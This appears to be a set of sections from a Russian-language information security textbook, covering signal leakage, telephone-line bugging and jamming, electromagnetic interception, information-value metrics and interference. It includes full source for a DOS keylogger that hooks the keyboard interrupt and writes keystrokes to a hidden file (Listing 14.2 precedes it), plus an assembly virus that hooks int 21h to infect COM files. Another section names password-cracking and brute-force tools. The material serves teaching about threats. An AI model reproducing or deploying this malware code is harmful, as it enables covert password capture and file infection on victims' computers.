Паразитные электромагнитные связи
Паразитные электромагнитные связи приводят к самовозбуждению отдельных каскадов звуковых и широкополосных усилителей на частотах порядка десятков и сотен мегагерц. Эти связи обычно возникают между выводными проводниками усилительных элементов, образующими колебательную систему с распределенными параметрами и резонансной частотой определенного порядка.
Паразитные электромеханические связи
Паразитные электромеханические связи проявляются в устройствах, корпус которых имеет механическую связь с включенным на вход усилителя громкоговорителем; в усилителях расположенных вблизи от громкоговорителя, а также в усилителях, подвергающихся вибрации (сотрясения). Механические колебания диффузора близкорасположенного громкоговорителя через корпус последнего и шасси усилителя, а также через воздух передаются усилительным элементам. Вследствие микрофонного эффекта эти колебания вызывают в цепях усилителя появление переменной составляющей тока, создающего паразитную обратную связь.
Транзисторы почти не обладают микрофонным эффектом, поэтому паразитная электромеханическая связь проявляется в основном в ламповых усилителях.
Паразитные обратные связи через источники питания
Паразитные обратные связи через источники питания в многокаскадном усилителе возникают вследствие того, что источники питания имеют внутреннее сопротивление.
Так, например, ток сигнала I усилителя (рис. 7.2), проходя через источник питания, создает на внутреннем сопротивлении Z последнего падение напряжения U, равное I Z. Это напряжение подается на предыдущие каскады вместе с постоянной составляющей напряжения источника питания, а затем через элементы межкаскадной связи попадает на входы усилительных элементов, создавая в усилителях паразитную обратную связь. В зависимости от соотношения фаз паразитной обратной связи и полезного сигнала, это напряжение может увеличивать напряжение сигнала и (при достаточной глубине) привести к его самовозбуждению.
Рис. 7.2. Схема возникновения паразитной связи в многокаскадном усилителе
Опасный сигнал может попасть в цепи электрического питания, создавая каналы утечки информации. В линию электропитания ВЧ передается за счет паразитных емкостей трансформаторов блоков питания (рис. 7.3).
Паразитные связи и наводки
Элементы, цепи, тракты, соединительные провода и линии связи любых электронных систем и схем постоянно находятся под воздействием собственных (внутренних) и сторонних (внешних) электромагнитных полей различного происхождения, индуцирующих или наводящих в них значительные напряжения. Такое воздействие называют электромагнитным влиянием или просто влиянием на элементы цепи. Коль скоро такое влияние образуется непредусмотренными связями, в подобных случаях говорят о паразитных (вредных) связях и наводках, которые приводят к образованию электрических каналов утечки информации.
Основными видами паразитных связей в схемах радиоэлектронного оборудования (РЭО) являются емкостные, индуктивные, электромагнитные, электромеханические связи и связи через источник питания и заземления РЭО.
Пассивная защита
К средствам пассивной защиты относятся фильтры и другие приспособления, предназначенные для срыва некоторых видов прослушивания помещений с помощью телефонных линий, находящихся в режиме отбоя. Эти средства могут устанавливаться в разрыв телефонной линии или встраиваться непосредственно в цепи телефонного аппарата.
Положительные свойства:
предотвращение перехвата речевой информации методом ВЧ-навязывания;
предотвращение перехвата речевой информации из-за утечки микро-ЭДС звонковой цепи;
предотвращение перехвата с помощью микрофонов, передающих речевую информацию по телефонной линии в длинноволновом диапазоне, при условии правильного размещения фильтра телефонной линии.
Недостатком средств пассивной защиты является то, что они не защищают от остальных систем перехвата.
Помимо указанных, широко применяются различные индикаторные приборы. Принцип действия индикаторных устройств основан на измерении и анализе параметров телефонных линий. Основными параметрами, которые наиболее просто поддаются контролю, являются значение постоянной составляющей напряжения в линии и величина постоянного тока, возникающего в линии во время разговора. Кроме того, анализу могут быть подвергнуты измерения активной и реактивной составляющей комплексного сопротивления линии, изменения напряжения в момент снятия трубки. В более сложных приборах производится анализ не только постоянной, но и переменной составляющей сигнала.
На основе проведенных измерений прибор принимает решение о наличии несанкционированных подключений или просто сигнализирует об изменении параметров линии. Именно использование достаточно сложного алгоритма принятия решения и отличает анализатор от простого индикатора.
Конечно, аппаратура контроля линий связи не обеспечивает полной защиты от злоумышленников, но жизнь им существенно усложняет. Для того чтобы включиться в защищенную линию и не быть при этом обнаруженным, злоумышленнику придется использовать системы перехвата, которые практически не меняют параметров линии или максимальной компенсируют изменения.
Справедливости ради надо отметить, что анализаторы и индикаторы имеют и целый ряд существенных недостатков.
Во-первых, отсутствуют четкие критерии для установления факта наличия несанкционированного подключения. Телефонные линии (особенно отечественные) далеко не идеальны. Даже в спецификации на стандартные параметры сигналов городских АТС предусмотрен большой разброс. Кроме того, параметры меняются в зависимости от времени суток, загруженности АТС, колебаний напряжения в электросети, влажности и температуры. Сильно влияют и различного вида наводки.
Во-вторых, высока вероятность ложных срабатываний. Более надежными оказываются те приборы, которые просто фиксируют изменения того или иного параметра, предоставляя принимать решение самому пользователю.
В-третьих, самым большим недостатком анализаторов является то, что они могут зафиксировать только небольшую часть устройств перехвата из богатого арсенала злоумышленников.
В-четвертых, почти все анализаторы устроены так, что при их установке требуется балансировка под параметры линии. Если при этой операции на линии уже была установлена закладка, то она обнаружена не будет.
Перехват акустической информации спомощью радиопередающих средств
К ним относится широкая номенклатура радиозакладок (радиомикрофонов, “жучков”), назначением которых является передача по радиоканалу акустической информации, получаемой на объекте.
Применение радиопередающих средств предполагает обязательное наличие приемника, с помощью которого осуществляется прием информации от радиозакладки. Приемники используются разные — от бытовых (диапазон 88–108 МГц) до специальных. Иногда применяются так называемые автоматические станции. Они предназначены для автоматической записи информации в случае ее появления на объекте.
Перехват акустической информациис помощью ИК передатчиков
Передача информации может осуществляется по ИК каналу. Акустические закладки данного типа характеризуются крайней сложностью их обнаружения. Срок работы этих изделий — несколько суток, но следует иметь в виду, что прослушать их передачу можно лишь на спецприемнике и только в прямом визуальном контакте, т.е. непосредственно видя эту закладку. Поэтому размещаются они у окон, вентиляционных отверстий и т.п., что облегчает задачу их поиска. Основное достоинство этих закладок — скрытность их работы.
Перехват и обработка файловых операций
Программное средство защиты информации (ПСЗИ) производит некоторые файловые операции. Для этого открывается файл, часть его или весь файл считывается в буфер оперативной памяти, обрабатывается и затем записывается в файл с прежним или новым именем.
Активизирующим событием в данном случае является, как правило, открытие файла (int 21h, функция 3Dh), либо его закрытие.
Таким образом, закладка порождает в системе “исходный файл — ПСЗИ — выходной файл” новые связи, включая в них свои операции и массивы данных.
Рассмотрим механизм работы закладки для DOS, которая встраивается в цепочку прерывания int 21h для следующих функций.
Открытие файла (функция 3Dh). Закладка отфильтровывает нужные имена или дескрипторы файлов.
Чтение из файла (функция 3Fh). Закладка выполняет прерывание по старому адресу указателя, затем сохраняет считанный буфер в собственный, обычно скрытый файл, либо исправляет в буфере некоторые байты файла, кроме того возможно влияние на результаты операции чтения. Данные действия особенно опасны для программ подтверждения подлинности электронных документов (электронная подпись).
Запись в файл (функция 40h). Закладка редактирует нужным образом буфер в оперативной памяти, либо сохраняет файл или часть его в скрытую область, а затем выполняет старое прерывание, в результате чего записывается файл с измененным содержанием, либо каким-то образом дублированный в скрытой области. Закладки такого типа могут навязывать истинность электронной подписи даже тогда, когда файл был изменен.
В листинге 14.2 представлен пример вируса, использующего механизм перехвата файловых операция для модификации файлов типа COM своим кодом.
Листинг 14.2. Пример перехвата файловых
операций для выполнения несанкционированной записи в файл
.model tiny
.code
org 100h
start:
push si
push si
mov es,bx
mov di,2B0h
cli
cmpsb
jz loc_2
dec si
dec di
Продолжение листинга 14.2
mov cl,50h rep movsb
mov si,21h*4
push si
movs word ptr es:[di],word ptr es:[si]
movs word ptr es:[di],word ptr es:[si]
pop di
mov al,2Bh
stosw
stosw
loc_2:
pop di
lea si,[di+50h]
mov cx,sp
sub cx,si
push cs
pop es
rep movsb
retn
; новый обработчик 21-го прерывания
cmp ah,3Ch ; функция создания файла ?
jne loc_5 ; если нет — на выход
int 0C0h ; если (2B0h+50h)/4 = 0C0h, т.е. адрес
; старого обработчика int 21h
push ax
xchg bx,ax
mov si,dx ; si = dx
locloop_3:
dec si
lodsw
cmp ax,'mo'
loopnz locloop_3
jnz loc_4
push ds
push cs
pop ds
mov ah,40h
mov cl,50h
cwd
int 21h
pop ds
Окончание листинга 14.2
loc_4:
pop ax
clc
retf 2
loc_5:
db 0EAh
int 20h
end start
Перехват электромагнитных излучений
Под перехватом электромагнитных излучений понимают получение разведывательной информации за счет приема сигналов электромагнитной энергии пассивными устройствами, расположенными на достаточно безопасном расстоянии от средств обработки информации с ограниченным доступом.
Злоумышленники осуществляют перехват открытых, кодированных и засекреченных связных радиостанций и систем связи. Ведется перехват и других электромагнитных излучений, таких как радиолокационные, радионавигационные системы, системы телеуправления и другие, а также перехват электромагнитных сигналов, возникающих в электронных средствах за счет самовозбуждения, акустического воздействия, паразитных колебаний и даже сигналов ПЭВМ, возникающих при выдаче информации на экран. Перехвату подвержены переговоры, ведущиеся с подвижных средств телефонной связи (радиотелефон, сотовая и мобильная связь); переговоры внутри помещений посредством бесшнуровых систем учрежденческой связи и т. д.
Перехват электромагнитных излучений базируется на широком использовании самых разнообразных радиоприемных средств, средств анализа и регистрации информации и других (антенные системы, широкополосные антенные усилители, панорамные анализаторы и др.).
Следует отметить, что перехват информации обладает рядом следующих особенностей по сравнению с другими способами добывания информации:
информация добывается без непосредственного контакта с источником;
на прием сигналов не влияют ни время года, ни время суток;
информация получается в реальном масштабе времени, в момент ее передачи или излучения;
добывание ведется скрытно, источник информации зачастую и не подозревает, что его прослушивают;
дальность прослушивания ограничивается только особенностями распространения радиоволн соответствующих диапазонов.
Дальность перехвата сигналов, например ПЭВМ, можно характеризовать показателями, которые учитывают конструктивные особенности дисплея и антенных систем перехвата (табл. 12.2).
Таблица 12.2. Влияние конструктивных
особенностей ПЭВМ и антенны на дальность перехвата
|
Характеристики антенн |
Корпус ПЭВМ |
|
|
пластмассовый |
металлический |
|
|
ненаправленная |
50 м |
10 м |
|
Направленная |
1000 м |
200 м |
Глава 13
Методы и средства несанкционированного получения...
информации из автоматизированных систем
Перехват ввода с клавиатуры
Закладки, анализирующие ввод с клавиатуры, являются достаточно опасными, поскольку клавиатура является основным устройством управления и ввода информации. Через клавиатурный ввод можно получить информацию о вводимых конфиденциальных сообщениях (текстах), паролях и т.д.
Перехват может производится двумя основными способами:
встраивание в цепочку прерывания int 9h;
анализом содержания клавиатурного порта или буфера по прерыванию от системного таймера.
Работа закладки основывается на полном сохранении всех нажатий (отжатий) клавиш в файле. Файл затем изучается, и на его основе злоумышленник, пытавшийся получить доступ к зашифрованным файлам, восстанавливает возможные парольные последовательности.
Пример подобной закладки приведен в листинге 14.1.
Листинг 14.1. Пример закладки, перехватывающей ввод с клавиатуры
{$M 2048,0,0}
{$F+}
Uses Dos;
const
ArchiveName = 'C:\WINDOWS\USER.BIN';
OldSS : Word = 0;
OldSP : Word = 0;
StackSW : Integer = - 1;
NewSS : Word = 0;
NewSP : Word = 0;
var
Old9h : Procedure;
R : Registers;
DOSSeg, DOSOfs : Word;
Tick, WaitBuf : Integer;
NeedPop : Boolean;
CBuf : Word;
KBuf : array [1..255] of Byte;
procedure BeginInt;
inline($FF/$06/StackSW/
$75/$10/
$8C/$16/OldSS/
$89/$26/OldSP/
$8E/$16/NewSS/
Продолжение листинга 14.1
$8B/$26/NewSP);
procedure EndInt;
inline($FF/$0E/StackSW/
$7D/$08/
$8E/$16/OldSS/
$8B/$26/OldSP);
procedure CallPop(Sub: Pointer);
begin
inline($FF/$5E/$06);
end;
procedure CLI; inline($FA);
procedure STI; inline($FB);
procedure TSRCrap;
var
F: File;
begin
CLI;
BeginInt;
STI;
NeedPop := False;
Assign(F, ArchiveName);
{$I-}
Reset(F,1);
{$I+}
if IOResult <> 0 then ReWrite(F,1) else seek(F,FileSize(F));
SetFAttr(F,ARCHIVE+HIDDEN);
BlockWrite(F,KBuf,CBuf); { Запись содержимого буфера в файл }
CBuf := 0;
Close(F);
Tick := 0;
CLI;
EndInt;
STI;
end;
Продолжение листинга 14.1
procedure RunTSR; interrupt;
begin
CLI;
BeginInt;
STI;
Inc(Tick);
if (Tick > 18.2 * WaitBuf) and (CBuf > 0) then
begin
NeedPop := True;
if Mem[DOSSeg:DOSOfs] = 0 then
begin
NeedPop := False;
Port[$20]:=$20;
TSRCrap;
end;
end;
CLI;
EndInt;
STI;
end;
procedure Int28TSR; interrupt;
begin
CLI;
BeginInt;
STI;
if NeedPop = True Then TSRCrap;
CLI;
EndInt;
STI;
end;
procedure New9h;interrupt;
{ Новый обработчик прерывания 9h }
var
Tail : Word absolute $40 : $1C;
B:Boolean;
begin
B := Port[$60]<$80;
inline($9C);
Old9h; { Вызов старого обработчика }
if B and (Lo(MemW[$40:Tail])<>0) then
Окончание листинга 14.1
begin
Inc(CBuf);
if CBuf > 255 Then CBuf := 255;
KBuf[CBuf]:=Lo(MemW[$40:Tail]); { Cохранение клавиши в буфере }
end;
end;
procedure InitTSR;
begin
NewSS := SSeg;
inline($89/$26/NewSP);
R.AH := $34;
MsDos(R);
DOSSeg := R.ES;
DOSOfs := R.BX;
end;
begin
InitTSR;
CBuf := 0;
FillChar(KBuf,SizeOf(KBuf),0);
WaitBuf := 5; { Задержка (сек) перед отправкой буфера в файл.}
NeedPop := False;
Tick := 0;
GetIntVec($9,@Old9h);
SetIntVec($9,@New9h);
SetIntVec($28,@Int28TSR);
SetIntVec($1C,@RunTSR);
Keep(0);
end.
Перехват вывода на экран
Рассмотрим только текстовый режим вывода. Режим графического вывода будет отличаться лишь тем, что изменится адрес видеобуфера в программе, и информация будет представлена в виде точек с определенным цветом.
В оперативной памяти ПЭВМ область видеобуфера имеет заранее известный фиксированный адрес. Видеобуфер, с точки зрения программы, представляет собой область обычной оперативной памяти, которая рассматривается как последовательность слов (16 бит) в формате: символ (8 бит) + цвет (8 бит).
Выводимый на экран текст помещается в видеобуфер, откуда может быть считан и сохранен закладкой.
Синхронизирующим событием в этом случае может быть:
ввод с клавиатуры длинной последовательности символов (обрабатываемого текста);
чтение из файла;
запуск программ с определенными именами.
Кроме того, возможно периодическое сохранение области экранного буфера по сигналу от системного таймера.
Показатели оценки информации как ресурса
Важность информации должна оцениваться по двум группам критериев (рис. 15.1):
по назначению информации;
по условиям ее обработки.
В первой группе следует выделить два критерия:
важность самих задач для обеспечения деятельности,
степень важности информации для эффективного решения соответствующей задачи.
Рис. 15.1. Критерии оценки важности информации
Во второй группе выделяются два составных критерия:
уровень потерь в случае нежелательных изменений информации в процессе обработки под воздействием дестабилизирующих факторов,
уровень затрат на восстановление нарушенной информации.
Если обозначить: Кви — коэффициент важности информации; Квз — коэффициент важности тех задач, для обеспечения которых используется информация; Киз — коэффициент важности оцениваемой информации для эффективного решения задач; Кпи — коэффициент важности оцениваемой информации с точки зрения потерь при нарушении ее качества; Ксв — коэффициент важности информации с точки зрения стоимости восстановления ее качества. Тогда получим:
Кви = f (Квз, Киз, Кпи, Ксв)
Иначе говоря, для оценки важности информации необходимо уметь определять значения перечисленных выше коэффициентов и знать вид функциональной зависимости Кви. Но на сегодняшний день неизвестно ни то, ни другое, и есть веские основания утверждать, что и в ближайшем будущем эта проблема не будет решена. Однако иногда для этих целей для конкретной информации и конкретных условий можно использовать подход, основанный на неформально-эвристических методах.
Полнота информации — это показатель, характеризующий меру достаточности оцениваемой информации для решения соответствующих задач. Отсюда следует, что и этот показатель, так же как и предыдущий, является относительным: полнота информации оценивается относительно вполне определенной задачи или группы задач. Поэтому чтобы иметь возможность определить показатель полноты информации, необходимо для каждой существенно значимой задачи или группы задач составить перечень тех сведений, которые необходимы для их решения.
Для предоставления таких сведений удобно использовать так называемые объективно-характеристические таблицы, которые представляют из себя двухмерные матрицы. У них по строкам приведен перечень наименований тех объектов, процессов или явлений, которые входят в круг интересов соответствующей задачи, а по столбцам — наименование тех характеристик (параметров) объектов, процессов или явлений, значения которых необходимы для решения задачи. Следовательно, сами значения характеристик будут располагаться на пересечении соответствующих строк и столбцов.
Под адекватностью информации понимается степень ее соответствия действительному состоянию тех объектов, процессов или явлений, которые отображает оцениваемая информация. В общем случае адекватность информации определяется двумя параметрами.
1. Объективностью генерирования (съема, определения, установления) информации об объекте, процессе или явлении.
2. Продолжительностью интервала времени между моментом генерирования информации и моментом оценки ее адекватности.
Объективность генерирования информации, очевидно, зависит от способа получения значений характеристик объекта, процесса или явления и качества реализации (использования) способа в процессе получения этих значений. Классификация характеристик по возможным способам получения их значений представлена на рис. 15.2.
Рассмотрим теперь адекватность информации по второму названному параметру — продолжительности интервала времени между моментом генерирования информации и текущим моментом. Для оценки адекватности по данному параметру вполне подходящим является известный в теории информации так называемый закон старения информации (рис. 15.3).
При этом под t0 понимается момент времени генерирования (получения) оцениваемой информации; Dt1 — продолжительность времени, в течение которого оцениваемая информация полностью сохраняет свою адекватность; Dt2
— продолжительность времени, в течение которого адекватность информации падает на 25%; Dt3 — продолжительность времени, в течение которого адекватность информации падает наполовину; Dt4 — продолжительность времени, в течение которого адекватность падает на 75%.
Рис. 15.2. Классификация характеристик по способам получения их значений
Рис. 15.3. Графическое представление закона старения информации
Учитывая то, что обе составляющие адекватности информации Ка' и Ка'' зависят от большого числа факторов, многие из которых носят случайный характер, есть основание утверждать, что они также носят случайный характер и поэтому могут интерпретироваться как вероятности того, что информация по соответствующему параметру является адекватной. Поскольку для подавляющего большинства теоретических исследований и практических приложений важно, чтобы информация была адекватной одновременно по обоим параметрам, то в соответствии с теоремой умножения вероятностей общий показатель адекватности информации может быть определен как: Ка = Ka' • Ka''. Независимость значений а' и а'' представляется вполне естественной.
Релевантность информации — это показатель, который характеризует соответствие ее потребностям решаемой задачи. Для количественного выражения данного показателя обычно используют так называемый коэффициент релевантности Кр — отношение объема релевантной информации Nр
к общему объему анализируемой информации Nо, т. е.
Кр =
Сущность коэффициента релевантности очевидна, но трудности практического его использования сопряжены с количественным выражением объема информации. Поэтому задача вычисления этого коэффициента на практике относится к весьма неопределенной и трудноразрешимой проблеме.
Толерантность информации — это показатель, характеризующий удобство восприятия и использования информации в процессе решения той задачи, для решения которой она используется. Уже из самого определения видно, что понятие толерантности является очень широким, в значительной мере неопределенным и субъективным. Поэтому вряд ли можно надеяться на разработку строго формальной методики определения толерантности информации.
Требуемый уровень ЗИ должен определяться с учетом значений всех рассмотренных показателей. Однако в настоящее время методика такого определения отсутствует и разработка ее требует самостоятельных исследований.В качестве выхода из сложившегося положения можно использовать следующую полуэвристическую процедуру.
1. Все показатели информации делятся на три категории: определяющие, существенные и второстепенные, причем основным критерием для такого деления должна служить та цель, для достижения которой осуществляется ЗИ.
2. Требуемый уровень защиты устанавливается по значениям определяющих показателей информации.
3. Выбранный уровень при необходимости может быть скорректирован с учетом значения существенных показателей. Значения второстепенных показателей при этом могут игнорироваться.
Получение доступа
Если принято решение о попытке проникновения, злоумышленник переходит к стадии активных действий, которые, как правило, выходят за рамки простого любопытствах, а в отдельных случаях могут уже квалифицироваться как уголовно наказуемые деяния.
Целью операций, предпринимаемых на данном этапе, является получение доступа на уровне легального пользователя АС или ОС. К таким операциям относятся:
перехват паролей;
подбор паролей для доступа к совместно используемым сетевым ресурсам;
получение файла паролей;
использование программ взлома, обеспечивающих интерактивный доступ к АС путем перевода работающих на АС приложений в нештатный режим.
Часто для получения доступа злоумышленники прибегают к социальному инжинирингу, побуждая пользователей тем или иным способом установить на своих АС программные закладки, действующие по принципу “Троянского коня”. Если это им удается, например, путем установки таких закладок, как Back Orifice или SubSeven, дальнейшее получение доступа к таким АС для злоумышленников не составляет труда.
В тех случаях, когда злоумышленник по каким-то причинам не может или не намерен манипулировать пользователями, ему приходиться обеспечивать получение доступа самостоятельно. Для этого он может применить такие средства, как NAT, SMBGrind, L0phcrack, NT RAS, winhlp32, IISHack (Windows NT/2000/XP), Brutus, brute_web.c, pop.c, middlefinger, TeeNet (Unix) и множество специализированных программ взлома, рассчитанных на применения против конкретных приложений.
Если АС предоставляет удаленный доступ к системе, например, на гостевом уровне, злоумышленник может предпринять попытку применения методов и средств, используемых при локальном доступе (например, скопировать файл паролей из небрежно настроенной системы).
Однако в некоторых случаях злоумышленникам вообще не приходится что-либо предпринимать, а просто воспользоваться “любезностью” легального пользователя, непредусмотрительно установившего какую-либо систему удаленного доступа с настроенным по умолчанию паролем (или даже вообще без пароля), например pcAnywhere, VNC или Remotely Anywhere.
В последнее время особенно часто жертвами злоумышленников становятся Web-серверы и работающие под их управлением приложения. Опытному взломщику Web-серверов достаточно провести несколько минут за исследованием Web-сервера, администраторы которого имеют поверхностное представление о безопасности, чтобы, не прибегая к особым ухищрением, получить доступ на уровне пользователя (а нередко и на системном или административном уровне), пользуясь одним лишь стандартным Web-клиентом.
Помехи
Помехой называется нежелательное электрическое и (или) магнитное воздействие на систему или ее часть, которое может привести к искажению хранимой, преобразуемой, передаваемой или обрабатываемой информации.
По происхождению помехи подразделяются на:
непреднамеренные помехи естественного происхождения (космические и атмосферные помехи, шумы антенных систем и внутренние шумы приемников);
непреднамеренные помехи искусственного происхождения;
организованные помехи, которые могут быть активными и пассивными.
Последний вид помех, в свою очередь, подразделяется на две группы: маскирующие помехи и имитирующие помехи. Маскирующие помехи создают шумовой фон, на котором трудно выделить полезный сигнал. Имитирующие помехи являются подделкой полезных сигналов по одному или нескольким параметрам.
По месту возникновения различают помехи внутренние и внешние. К внутренним шумам можно отнести шумы, наводки и помехи от рассогласования.
Шум — это флуктуационный процесс, связанный с дискретной природой электрического тока и представляющий собой последовательность очень коротких импульсов, появляющихся хаотически в большом количестве.
Различают разнообразные виды шумов: тепловой, полупроводниковый, дробовой и т.д. Тепловой шум возникает в проводниках за счет теплового хаотического движения электронов. Полупроводниковый — вследствие статического характера процесса генерации-рекомбинации пар электронов и дырок. Дробовой шум возникает вследствие случайного характера преодоления носителями тока потенциальных барьеров, например электронно-дырочных переходов.
Наводка — это помеха, возникающая вследствие непредусмотренной схемой и конструкцией рассматриваемого объекта передачи по паразитным связям напряжения, тока, заряда или магнитного потока из источника помехи в рассматриваемую часть объекта. Под паразитной связью при этом следует понимать связь по электрическим и (или) магнитным цепям, появление которой не было предусмотрено конструктором. В зависимости от физической природы элементов паразитных электрических цепей, различают паразитную связь через общее полное сопротивление, емкостную паразитную связь, паразитную связь через взаимную индуктивность (индуктивную паразитную связь) и др.
В зависимости от того, является ли источник помех, вызывающих наводку, частью объекта, различают соответственно внутреннюю и внешнюю наводки.
Помеха от рассогласования представляет собой нежелательный переходный процесс в рассматриваемой цепи объекта, содержащей участки с распределенными и сосредоточенными параметрами, который возникает вследствие рассогласования между неоднородными участками.
Наводки и помеха от рассогласования могут возникать не только в сигнальных цепях, но и в цепях питания и заземления.
По характеру протекания процесса во времени различают помехи импульсные и флуктуационные.
К внешним помехам относятся промышленные (индустриальные), от радиопередатчиков, атмосферные и космические.
Индустриальные помехи можно разделить на две большие группы. К первой группе относятся устройства, генерирующие относительно регулярные электромагнитные колебания, не предназначенные для излучения, такие как медицинские высокочастотные установки, различного рода промышленные агрегаты, системы развертки и др. Помехи, излучаемые такими источниками, как на основной частоте, так и на гармониках, представляют собой колебания, близкие к гармоническим.
К источникам второй группы относятся различные электрические устройства, не вырабатывающие периодических электромагнитных колебаний. К ним относятся линии электропередач, системы зажигания двигателей внутреннего сгорания, высокочастотная аппаратура для дуговой сварки, газоразрядные устройства, индукционная и переключающая аппаратура и др. На частотах, превышающих 30 МГц, индустриальные помехи, порождаемые системами зажигания, обычно преобладают над помехами, создаваемыми другими источниками. На частотах ниже 30 МГц преобладающими являются помехи, порождаемые линиями электропередач.
По предсказуемости времени появления и формы различают случайные (стохастические) и регулярные помехи.
По результатам воздействия на полезный сигнал различают помехи аддитивные и мультипликативные.
Аддитивная помеха не зависит от сигнала и вызывается сторонним возмущением поля, которым передается сигнал по каналу связи.
Мультипликативная помеха обусловлена сторонним изменением коэффициента передачи канала связи.
В общем виде влияние помехи x на передаваемый сигнал может быть выражено следующим оператором:
c = V(s,x)
В том частном случае, когда оператор вырождается в сумму c = s + x, помеха x называется аддитивной. Аддитивную помеху часто называют шумовой. Если же оператор V может быть представлен в виде c = Vs, где случайный процесс V(t) неотрицателен, то помеху V называют мультипликативной. Если V — медленный (по сравнению с s) процесс, то явление, вызываемое мультипликативной помехой, носит название замирания (фединг).
В более общем случае при одновременном наличии аддитивной и мультипликативной помех удобно записать в следующем виде:
c = Vs + x
С физической точки зрения случайные помехи порождаются различного рода флуктуациями, которыми в физике называют случайные отклонения тех или иных физических величин от их средних значений.
Внешние помехи объектам безотносительно первоисточника их возникновения можно подразделить на помехи от сети питания, из внешних линий связи, от разрядов электрических зарядов и от электромагнитных полей излучения.
Помехи из сети питания переменного тока в свою очередь можно подразделить на импульсные помехи, провалы и перенапряжения.
Провал напряжения в сети питания переменного тока — это помеха, в течение действия которой значение амплитуды напряжения в сети в каждом полупериоде частоты переменного тока становится меньше регламентированного минимально допустимого значения.
Перенапряжение в сети питания переменного тока — это помеха, в течении действия которой значение амплитуды напряжения в сети в каждом полупериоде частоты переменного тока превышает регламентированное максимально допустимое значение.
Импульсные помехи из сети питания можно подразделить на симметричные и несимметричные.
Напряжение симметричных помех приложено между фазными проводами питающей сети, а несимметричных — между фазным проводом и землей.
Под помехами из внешних линий связи подразумеваются помехи, попадающие в аппаратуру рассматриваемого объекта из линий связи с устройствами, не являющимися частями объекта.
Наиболее характерными помехами из внешних линий связи являются симметричные и несимметричные импульсные помехи и помехи от неэквипотенциальности точек заземления.
 Рис. 14.1. Возникновение напряжения помехи от неэквипотенциальности точек заземления |
Напряжение помехи от неэквипотенциальности точек заземления приложено между точками заземления отдельных устройств. Если связи между устройствами являются гальваническими и обратные провода связи соединены с корпусами устройств, то это напряжение оказывается приложенным к обратному проводу связи (рис. 14.1).
Приборы для постановки активной заградительной помехи
Эти приборы предназначены для защиты телефонных линий практически от всех видов прослушивающих устройств. Достигается это путем подачи в линию дополнительных сигналов (заградительной помехи) и изменения стандартных параметров телефонной линии (обычно в разумных пределах изменяется постоянная составляющая напряжения в линии и ток в ней) во всех режимах работы. Для того чтобы помехи не очень сильно мешали разговору, они компенсируются перед подачей на телефонный аппарат владельца. Во избежание неудобств для удаленного абонента помехи подбираются из сигналов, которые затухают в процессе прохождения по линии или легко фильтруются абонентским комплектом аппаратуры городской АТС. Для “хорошего” воздействия помехи на аппаратуру перехвата ее уровень обычно в несколько раз, а иногда и на порядки превосходит уровень речевого сигнала в линии.
Эти помехи воздействуют на входные каскады, каскады АРУ, узлы питания аппаратуры перехвата, что проявляется в перегрузке входных цепей, в выводе их из линейного режима. Как следствие, злоумышленник вместо полезной информации слышит в наушниках лишь шум.
Некоторые виды помех позволяют воздействовать на телефонные радиоретрансляторы таким образом, что происходит смещение или “размывание” несущей частоты передатчика, резкие скачки частоты, искажения формы высокочастотного сигнала, перемодуляция или периодическое понижение мощности излучения. Кроме того, возможен “обман” системы принятия решения, встроенной в некоторые виды аппаратуры несанкционированного получения информации, и перевод ее в “ложное состояние”. В результате такие устройства начинают расходовать свои ограниченные ресурсы, например, звуковой носитель или элементы питания. Если в нормальном режиме такой передатчик работает периодически (только при телефонных переговорах), а автоматическая система регистрации включается только при наличии радиосигнала, то в этом случае она работает постоянно. В результате злоумышленнику приходится прибегать к услугам оператора для выделения полезной информации (если она осталась), что чаще всего нереализуемо.
Все сказанное свидетельствует о высокой эффективности защиты, обеспечиваемой постановщиками заградительной помехи, однако и им присущи некоторые недостатки.
Постановщики заградительных помех обеспечивают защиту телефонной линии только на участке от самого прибора, к которому подключается штепсель телефонного аппарата, до городской АТС. Поэтому остается опасность перехвата информации со стороны незащищенной линии противоположного абонента и на самой АТС. Поскольку частотный спектр помехи расположен выше частотного спектра речевого сигнала, теоретически достаточно легко отделить полезный сигнал от помехи.
Несмотря на столь серьезные недостатки, постановщики заградительных помех получили наибольшее распространение среди всех видов техники, предназначенной для защиты телефонных линий. Одной из причин такой популярности является защита своего плеча телефонной линии при приобретении только одного прибора защиты.
Понимая принцип действия этих приборов, можно сделать вывод о том, что они не защищают от аппаратуры прослушивания, установленной непосредственно на АТС. Не защищают они и от специальной аппаратуры, и от аппаратуры, применяемой стационарно. Однако подобная аппаратура имеется только у профессионалов из спецслужб и недоступна большинству злоумышленников. Поэтому вероятность перехвата информации таким способом низка, и ею можно пренебречь. Поскольку лучшие образцы постановщиков помех очень эффективно противодействуют широко распространенной малогабаритной технике перехвата, установка которой на линию существенно проще, чем установка специальной аппаратуры, поэтому их использование вполне оправдано.
Зная недостатки постановщиков помех, можно скомпенсировать их обеспечением комплексного подхода к решению проблемы защиты телефонных линий. Для этого в состав приборов вводятся системы для обнаружения несанкционированных подключений. Порой такие системы ничем не уступают анализаторам телефонных линий. Кроме того, лучшие образцы приборов защиты позволяют вести борьбу со всем спектром существующей на сегодняшний день малогабаритной техники перехвата, в том числе предназначенной для перехвата речевой информации из помещения в промежутках между телефонными переговорами.
Современные технические решения позволяют осуществлять гарантированное подавление многих видов техники перехвата.
Малогабаритные технические средства перехвата не могут противостоять постановщикам заградительных помех. Чтобы понять, почему это так, проанализируем технические задачи, которые приходится решать при разработке техники перехвата на примере радиозакладок.
1. Необходимо обеспечить высокую стабильность частоты несущей при достаточно высокой мощности передатчика в условиях:
широкого диапазона рабочих температур;
широкого диапазона изменяющегося напряжения по телефонной линии;
невозможности отбора большого тока из телефонной линии;
обеспечения минимальных побочных излучений;
обеспечения минимальных излучений на кратных гармониках;
минимально возможной длины антенны;
внесения минимальных нелинейностей в телефонную линию.
2. Необходимо обеспечить живучесть передатчика в условиях прохождения через него вызывных сигналов высокой амплитуды.
3. Необходимо обеспечить хорошее качество и громкость передачи звука притом, что качество и уровень сигнала на разных линиях существенно различаются.
4. Необходимо обеспечить устойчивую работу передатчика в условиях возможных внешних паразитных электрических и электромагнитных наводок.
5. Необходимо обеспечить минимальные размеры передатчика и удобство его установки.
Выполнение всех этих условий, естественно, является техническим компромиссом. Для того чтобы устройству перехвата было сложнее отфильтровать помеху, ее спектр должен находиться как можно ближе к речевому спектру, находящемуся в полосе частот от 300 Гц до 3 кГц. При этом амплитуда помехи должна превосходить речевой сигнал на 1–2 порядка. В этом случае можно ожидать, что будет нарушена работа даже самого стойкого к подавлению устройства — индуктивного датчика, собранного на низкочастотном магнитопроводе.
